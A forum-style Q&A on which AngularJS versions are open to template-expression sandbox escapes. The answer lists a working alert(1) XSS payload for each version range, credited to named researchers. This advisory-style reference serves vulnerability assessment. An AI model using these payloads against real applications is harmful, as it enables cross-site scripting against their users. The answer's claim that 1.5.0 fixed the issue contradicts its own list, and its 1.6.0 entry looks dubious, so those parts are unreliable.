# AngularJS Template Expression Sandbox Escape

Tags: angularjs, security

I've recently stumbled upon following article https://gist.github.com/molnarg/5348cd4254cabc1d4f7b. It describes sandbox escape vulnerability in AngularJS. The vulnerability has been fixed in AngularJS 1.3.2.

Is AngularJS 1.2.26 and 1.2.27 also vulnerable? Retirejs says it is http://retirejs.github.io/retire.js/, but there is no note about it neither in original article nor in AngularJS documentation.

Comment: Just a note: 1.3.2 is also vulnerable.

Answer (score 2):

#### Yes

Inferring from Angular Blog, version 1.5.0 is supposed to have fixed this.
It does not appear in the list(below) of vulnerable versions.

#### Blog: https://blog.angularjs.org/

#### Blog Excerpt:

There have been a number of people who have contributed to the project over the last few releases by analyzing and identifying security issues in the Angular code base, which we have then fixed. We really appreciate the work that these people do. In particular we would like to thank Mario Heiderich, Gareth Heyes and Jann Horn and the security team at Google.

#### Migration Guide: https://docs.angularjs.org/guide/migration

#### Vulnerable Versions as of 05/09/2016

Here's a list of vulnerabilities and the versions they apply to as of 05/09/2016, taken from PortSwigger: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

1.0.1 - 1.1.5
Mario Heiderich (Cure53)

```
{{constructor.constructor('alert(1)')()}}
```

1.2.0 - 1.2.1
Jan Horn (Cure53)

```
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
```

1.2.2 - 1.2.5
Gareth Heyes (PortSwigger)

```
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
```

1.2.6 - 1.2.18
Jan Horn (Cure53)

```
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
```

1.2.19 - 1.2.23
Mathias Karlsson

```
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
```

1.2.24 - 1.2.29
Gareth Heyes (PortSwigger)

```
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
```

1.3.0
Gábor Molnár (Google)

```
{{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
        (''+''.toString(
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
          'alert(1);'
        ))
    );}}
```

1.3.1 - 1.3.2
Gareth Heyes (PortSwigger)

```
{{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf; 
    $eval('x=alert(1)//'); 
}}
```

1.3.3 - 1.3.18
Gareth Heyes (PortSwigger)

```
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}
```

1.3.19
Gareth Heyes (PortSwigger)

```
{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
    $eval('x=alert(1)//'); 
}}
```

1.3.20
Gareth Heyes (PortSwigger)

```
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
```

1.4.0 - 1.4.9
Gareth Heyes (PortSwigger)

```
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
```

1.5.0 - 1.5.8
Ian Hickey

```
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
```

1.6.0

```
{{<script>alert(1)</script>}}
```